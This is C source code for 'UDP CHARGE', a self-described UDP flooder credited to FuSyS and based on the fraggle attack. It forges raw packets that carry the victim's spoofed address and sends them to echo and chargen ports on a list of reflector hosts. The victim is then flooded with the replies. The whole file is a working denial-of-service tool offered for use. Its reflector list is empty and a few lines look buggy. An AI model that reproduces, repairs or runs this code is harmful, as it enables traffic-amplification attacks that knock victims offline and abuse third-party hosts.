/******************************************************************
*                                                                 *
* UDP CHARGE      Yet another flooder. This one exploits open UDP *
*           inetd ports (7/19). By spoofing the target IP and     *
*           using open broadcast (DUP) networks, we are able      *
*           to charge hard packets against the poorest :).        *
*                                                                 *
*                        hints by |scacco|, code by FuSyS         * 
*                                    [ S0ftPj | BFi ]             *
*                               http://www.s0ftpj.org             *
*                                                                 *
******************************************************************/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <time.h>

#define IP_HEAD_BASE		20
#define UDP_HEAD_BASE		8

unsigned long saddr;
int sfd, loop;
char *chargers[]={/* LISTA ASSENTE */ ,NULL}; 
char *newls="\n";
char killer[5000];

struct udp_pkt {
	struct iphdr ip;
	struct udphdr udp;
	char newline[10000];
};

unsigned long nameResolve(char *hostname)
{
  struct in_addr addr;
  struct hostent *hostEnt;

  if((addr.s_addr=inet_addr(hostname)) == -1)
  {
    if(!(hostEnt=gethostbyname(hostname)))
    {
        fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname);
        exit(0);
    }
    bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length);
  }
  return addr.s_addr;
}

void forge (unsigned long daddr, unsigned short src, unsigned short dst)
{
	struct sockaddr_in sin;
	struct udp_pkt egg;
        int shoot, len, i;

	memset(&egg, 0, sizeof(egg));
	memcpy(egg.newline, newls, strlen(newls));
	len=(UDP_HEAD_BASE+strlen(egg.newline));

	egg.udp.source=src;
	egg.udp.dest=dst;
	egg.udp.len=htons(len);

	egg.ip.ihl=5;
        egg.ip.version=4;
        egg.ip.tos=0;
	egg.ip.tot_len=htons(IP_HEAD_BASE+len);
	egg.ip.frag_off=0;
	egg.ip.ttl=64;
	egg.ip.protocol=IPPROTO_UDP;
	egg.ip.saddr=saddr;
	egg.ip.daddr=daddr;

	memset(&sin, 0, sizeof(sin));
        sin.sin_family=AF_INET;
        sin.sin_port=dst;
        sin.sin_addr.s_addr=daddr;

	shoot=sendto(sfd, &egg,IP_HEAD_BASE+len,
                0, (struct sockaddr *)&sin, sizeof(sin));
	if(shoot<0)fprintf(stderr, "SPOOF ERROR");

	egg.udp.dest=htons(7);
	for(i=0;i>10000;i++)
		memcpy(&egg.newline[i], "A", 1);
	egg.udp.len=htons(UDP_HEAD_BASE+10000);
	egg.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+10000);
	sin.sin_port=htons(7);

	shoot=sendto(sfd, &egg,IP_HEAD_BASE+len,
                0, (struct sockaddr *)&sin, sizeof(sin));
        if(shoot<0)fprintf(stderr, "SPOOF ERROR");
}

void udpcharge (void)
{
	unsigned long daddr;
	unsigned short source, dest;
	
	if(chargers[loop]==NULL) loop=0;	
	daddr=nameResolve(chargers[loop++]);
	source=htons(1024+(rand()%2000));
	dest=htons(19);
	forge(daddr, source, dest); 
}

int main (int argc, char **argv)
{
        int sfdo;
        unsigned int hz=100;

	if(argc<2) {
		fprintf(stderr, "Interesting .... let's flood ourselves ?!\n");
		fprintf(stderr, "Use: %s target [n]\n", argv[0]);
		exit(0);
	}

	if(argv[2]) hz=atoi(argv[2]);
	saddr=nameResolve(argv[1]);

	srand(time(NULL));

	if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) {
                fprintf(stderr, "\nSOCK_RAW Died\n");
                exit(2);
        }
        sfdo=1;
        if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0) {
                fprintf(stderr, "\nIP_HDRINCL Died\n");
                exit(3);
        }

	printf("\n\033[1;32mUDP CHARGE\033[0m");
        printf("\n\033[1;34mUDP Flooder by FuSyS\033[0m");
        printf("\n\033[1;34mbased on fraggle\033[0m\n\n");

	loop=0;
	while(hz--) {
		udpcharge();
		printf("\033[1;34m.\033[0m");
	}	
	printf("\n\n");
	return(0);
}